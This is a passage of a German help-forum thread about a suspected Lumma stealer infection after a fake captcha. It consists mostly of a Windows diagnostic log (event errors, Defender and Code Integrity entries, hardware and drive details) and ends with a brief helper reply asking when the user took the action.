Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren..
Error: (12/30/2024 10:30:58 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.]
Error: (12/30/2024 10:29:56 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.]
Error: (12/30/2024 10:28:45 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1512) (User: NT-AUTORITÄT)
Description: Die Registrierungsdatei konnte nicht entladen werden. Der für die Registrierung verwendete Arbeitsspeicher wurde nicht freigegeben. Dieses wird oft durch Dienste verursacht, die unter einem Benutzerkonto ausgeführt werden. Versuchen Sie die Dienste entweder unter dem Konto "LocalService" oder "NetworkService" auszuführen.
Details - Zugriff verweigert
Error: (12/30/2024 10:28:45 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1512) (User: NT-AUTORITÄT)
Description: Die Registrierungsdatei konnte nicht entladen werden. Der für die Registrierung verwendete Arbeitsspeicher wurde nicht freigegeben. Dieses wird oft durch Dienste verursacht, die unter einem Benutzerkonto ausgeführt werden. Versuchen Sie die Dienste entweder unter dem Konto "LocalService" oder "NetworkService" auszuführen.
Details - Zugriff verweigert
Error: (12/30/2024 08:37:04 PM) (Source: Application Error) (EventID: 1000) (User: E595)
Description: Name der fehlerhaften Anwendung: powershell.exe, Version: 10.0.22621.3085, Zeitstempel: 0x67701590
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.22621.4541, Zeitstempel: 0xa1c8097c
Ausnahmecode: 0xc0000374
Fehleroffset: 0x000eddbf
ID des fehlerhaften Prozesses: 0x0x7fc0
Startzeit der fehlerhaften Anwendung: 0x0x1db5af22e446fd7
Pfad der fehlerhaften Anwendung: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 51215aa5-740e-4fd9-8469-a4e7f1e26cf0
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (12/27/2024 08:55:35 AM) (Source: Application Hang) (EventID: 1002) (User: NT-AUTORITÄT)
Description: Das Programm ms-teamsupdate.exe Version 24295.605.3225.8804 hat aufgehört mit Windows zu interagieren und wurde geschlossen. Weitere Informationen zum Problem finden Sie im Problemverlauf in der Systemsteuerung „Sicherheit und Wartung“.
Error: (12/19/2024 04:10:11 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
Systemfehler:
=============
Error: (01/06/2025 11:42:12 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1033) (User: NT-AUTORITÄT)
Description: In der EFI-Partition wurde ein möglicherweise gesperrter Start-Manager erkannt. Weitere Informationen finden Sie unter https://go.microsoft.com/fwlink/?linkid=2169931
Error: (01/06/2025 11:37:19 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.
Error: (01/06/2025 11:37:19 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht.
Error: (01/06/2025 11:37:17 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1033) (User: NT-AUTORITÄT)
Description: In der EFI-Partition wurde ein möglicherweise gesperrter Start-Manager erkannt. Weitere Informationen finden Sie unter https://go.microsoft.com/fwlink/?linkid=2169931
Error: (01/06/2025 11:35:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CxUIUSvc" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.
Error: (01/06/2025 11:35:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (45000 ms) wurde beim Verbindungsversuch mit dem Dienst CxUIUSvc erreicht.
Error: (01/06/2025 11:35:07 AM) (Source: VBoxNetLwf) (EventID: 12) (User: )
Description: Der Treiber hat einen internen Treiberfehler auf \Device\VBoxNetLwf gefunden.
Error: (01/06/2025 11:16:13 AM) (Source: VBoxNetLwf) (EventID: 12) (User: )
Description: Der Treiber hat einen internen Treiberfehler auf \Device\VBoxNetLwf gefunden.
Windows Defender:
================
Date: 2025-01-06 08:25:04
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {635D4E25-49F9-40E4-AF69-F6D992BD7900}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-12-30 20:42:46
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {8E707654-BE1A-4F1F-BC64-0FCAB0976B47}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-12-19 18:47:06
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {93AF2F57-1F88-49A7-A24F-A3AEB96F239B}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-12-18 17:45:51
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {D2D4903C-367C-4A33-949C-195B8026FEA3}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Date: 2024-12-17 18:17:17
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {12D3C73A-9EF0-48B4-BDB5-F6232E100156}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Event[0]
Date: 2024-05-20 17:36:14
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen:
%Vorherige Version der Sicherheitsinformationen: 1.411.148.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
%Vorherige Modulversion: 1.1.24040.1
Fehlercode: 0x80240016
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support".
CodeIntegrity:
===============
Date: 2024-05-30 15:48:47
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\fcon.dll because the set of per-page image hashes could not be found on the system.
Date: 2024-04-29 14:40:34
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Citrix\ICA Client\Receiver\FeatureFlagHelper64.dll that did not meet the Microsoft signing level requirements.
Date: 2024-04-25 17:12:36
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Citrix\ICA Client\Receiver\FeatureFlagHelper.dll that did not meet the Microsoft signing level requirements.
==================== Speicherinformationen ===========================
BIOS: LENOVO R11ET45W (1.25 ) 07/04/2022
Hauptplatine: LENOVO 20NF0000GE
Prozessor: AMD Ryzen 7 3700U with Radeon Vega Mobile Gfx
Prozentuale Nutzung des RAM: 21%
Installierter physikalischer RAM: 30605.63 MB
Verfügbarer physikalischer RAM: 24015.54 MB
Summe virtueller Speicher: 32525.63 MB
Verfügbarer virtueller Speicher: 25988.89 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:302.68 GB) (Free:37.89 GB) (Model: WDC PC SN520 SDAPMUW-512G-1001) NTFS
Drive d: () (Fixed) (Total:465.76 GB) (Free:375.65 GB) (Model: CT500MX500SSD1) NTFS
\\?\Volume{810b3311-8b68-489b-97b7-8d8720c1f38f}\ () (Fixed) (Total:0.85 GB) (Free:0.09 GB) NTFS
\\?\Volume{bb9fffbd-dd56-43ed-bbe2-b5f90fc216fa}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.21 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Protective MBR) (Size: 465.8 GB) (Disk ID: 00000000)
Partition: GPT.
==========================================================
Disk: 1 (Size: 476.9 GB) (Disk ID: 2103C249)
Partition: GPT.
==================== Ende von Addition.txt =======================
Marcel |
|
Gestern, 19:11
| #2 |
| /// Winkelfunktion /// TB-Süch-Tiger™   |  Windows 11: Vermeintliche Infektion mit Lumma?-Stealer nach Fake-Captcha Wann hast du das gemacht? Wenn ich die o.g. Links öffne kommt nur irgendein Unsinn wie das hier: Why am I seeing this page?
__________________
__________________ |
|
| Themen zu Windows 11: Vermeintliche Infektion mit Lumma?-Stealer nach Fake-Captcha |
| .dll, adobe, auswerten, captchas, computer, defender, desktop, fehler, firewall, google, homepage, internet, internet explorer, mozilla, problem, prozesse, realtek, registry, scan, server, services.exe, software, stealer or trojaner, svchost.exe, udp, updates, win 11, windows |
Linear-Darstellung
